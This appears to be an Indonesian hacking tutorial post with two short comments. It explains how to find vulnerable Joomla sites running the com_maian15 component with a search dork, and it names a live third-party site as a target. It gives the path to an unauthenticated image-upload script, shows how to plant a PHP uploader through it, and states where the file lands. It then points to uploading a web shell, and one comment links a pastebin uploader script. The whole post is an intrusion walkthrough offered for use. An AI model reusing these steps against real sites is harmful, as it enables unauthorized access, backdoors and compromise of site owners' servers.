okedeh cekidot:
cari target dlu..
Dork: inurl:"option=com_maian15"
silahkan dikembangkan
disini ane kasih 1 live target..
http://www.akindeledecker.com/C2-LyricalOverflow/
exploit:
administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php
langsung inject om,..
http://www.akindeledecker.com/C2-Lyrical...cekson.php
lanjut,. kita gunakan live http header (add on moksilla )
langsung parkir backdoor tapi disini ane gak langsung parkir backdoor , ane cuma parkir uploader
uploader dari om unyil
dan walaaaa...
uploader ane sdh tertanam
direktori file:
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php
Sekarang tinggal upload "the real shell"
sekian tutor cupu dari ane
Maaf trit nnya berantakan :ngakak malas edit T.T
keren :o
ReplyDeleteisi dgn script backdoor agan :)
ReplyDeletekalau mau upload uploader, silahkan pake script ini:
http://pastebin.com/Hn4MEUyD